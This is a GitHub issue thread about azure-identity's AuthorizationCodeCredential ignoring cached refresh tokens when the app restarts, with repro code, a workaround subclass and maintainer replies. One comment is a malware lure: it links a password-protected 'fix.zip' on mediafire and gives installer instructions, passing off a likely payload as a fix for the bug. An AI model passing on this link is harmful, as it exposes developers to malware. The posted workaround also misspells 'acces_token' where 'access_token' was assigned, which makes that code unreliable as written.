### ISSUE TITLE
AuthorizationCodeCredential with TokenCachePersistenceOptions doesn't use refresh token to retrieve new access token, when restarting app

### ISSUE THREAD

**Issue by guanteck** [Azure/azure-sdk-for-python#37029]
- **Package Name**: azure.identity
- **Package Version**: 1.17.1
- **Operating System**: Windows
- **Python Version**:  3.10

**Describe the bug**
I'm establishing a connection using the ``GraphServiceClient`` from the msgraph sdk and the ``AuthorizationCodeCredential`` class. I use the ``TokenCachePersistenceOptions`` in order to cache the token on disk securely. 
After connecting and stopping the app for about an hour, I restart the app. In this case, I get "authorization code or refresh token expired". 
After debugging, I could find out that:
- When using TokenCachePersistenceOptions, the access token will be used to establish a connection whether it is expired or not. I expected, that it will instead use the refresh token to retrieve a valid access token.
- If i overwrite the function ``_acquire_token_silently()``, and manually redeem a new access token using the refresh token, I have no issue reconnecting.

**Code to reproduce**
Initialize the graph service client and its credentials and tokencache:
```python
from azure.identity import AuthorizationCodeCredential
from msgraph import GraphServiceClient
from azure.identity import TokenCachePersistenceOptions

cache_options = TokenCachePersistenceOptions(name="some_name")
credential = AuthorizationCodeCredential(tenant_id=tenant_id,
                                         client_id=client_id,
                                         authorization_code=authorization_code,
                                         redirect_uri=redirect_uri,
                                         client_secret=client_secret,
                                         cache_persistence_options=cache_options)

graph_client = GraphServiceClient(credential)
# Do something with the client, check the connection, e.g., await graph_client.me.get()
```
Stop the app and wait for about an hour until the access token expired and then start the app again => "authorization code or refresh token expired" occurs.

**Workaround**
If I overwrite the function ``_acquire_token_silently()``  in ``AuthorizationCodeCredential`` like so:

``` python
from typing import Any, Optional
from azure.identity import AuthorizationCodeCredential
from azure.core.credentials import AccessToken
from azure.core.exceptions import ClientAuthenticationError

class _AuthorizationCodeCredential(AuthorizationCodeCredential):
    def __init__(self, 
                 tenant_id: str, 
                 client_id: str, 
                 authorization_code: str, 
                 redirect_uri: str, 
                 **kwargs: Any) -> None:
        super().__init__(tenant_id, client_id, authorization_code, redirect_uri, **kwargs)

    def _acquire_token_silently(self, *scopes: str, **kwargs) -> Optional[AccessToken]:   
        access_token = self._client.get_cached_access_token(scopes, **kwargs)
        for refresh_token in self._client.get_cached_refresh_tokens(scopes):
            if "secret" in refresh_token:
                access_token = self._client.obtain_token_by_refresh_token(scopes, refresh_token["secret"], **kwargs)
                if acces_token:
                    break
        return acces_token
```
Then I have no issues reconnecting using the cached token.

**Expected behavior**
If the access token in the token cache has expired, it should use the cached refresh token to retrieve a new access token.

Edit: I've updated the workaround

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kristapratico** [comment]
@guanteck, thanks for your issue, we'll take a look and respond as soon as possible.

**Comment by pvaneck** [comment]
Hey, thanks for the feedback. Overall, I think we could probably do the refreshing in the `_acquire_token_silently` method in this case, but I will need to double-check with the rest of the Identity team on what the expected behavior is for this scenario. Currently, the refreshing should still happen, but only if the credential detected that the authorization code has already been used (i.e. internally set to `None`). 

To verify, it appears you are hitting the case where the authorization code being passed in to the credential constructor has already been used and is failing the request [here](https://github.com/Azure/azure-sdk-for-python/blob/main/sdk/identity/azure-identity/azure/identity/_credentials/authorization_code.py#L98)?

**Comment by guanteck** [comment]
Hi, thanks for the answer. I tried it again, and it seems like its caused by the authorization code check you've mentioned.

**Comment by pvaneck** [comment]
Hey, sorry for the delay in looping back on this. After looking at the behavior of other languages for this, it appears that `TokenCachePersistenceOptions` isn't supported for their respective `AuthorizationCodeCredential`, so Python might be flying solo on this scenario.

@xiangyan99, @chlowell, since you might have more context on this credential, would it make sense for us to support this scenario of a user passing in an invalid/used authorization code to `AuthorizationCodeCredential`, but there still being a valid refresh tokens in the cache. Looks like when we try to [acquire a token silently](https://github.com/Azure/azure-sdk-for-python/blob/main/sdk/identity/azure-identity/azure/identity/_credentials/authorization_code.py#L94), we only check for cached access tokens, but not refresh tokens. Any reason not to have this check for refresh tokens here as well?

> Edit: Btw, is there any option to purge the token cache some_name for cache_options = TokenCachePersistenceOptions(name="some_name")?

I don't believe there is. An alternative way to purge is to just delete the cache file(s) which is located in `%LOCALAPPDATA%/.IdentityService/<some_name>.*` for Windows or `~/.IdentityService/<some_name>.*` for Linux.

**Comment by guanteck** [comment]
Hi, thanks for the heads-up.
My workaround for now is to set ``authorization_code=None`` in ``AuthorizationCodeCredential``, when we already have a token in the cache, and for the initial connection ``authorization_code='some_auth_code'``.
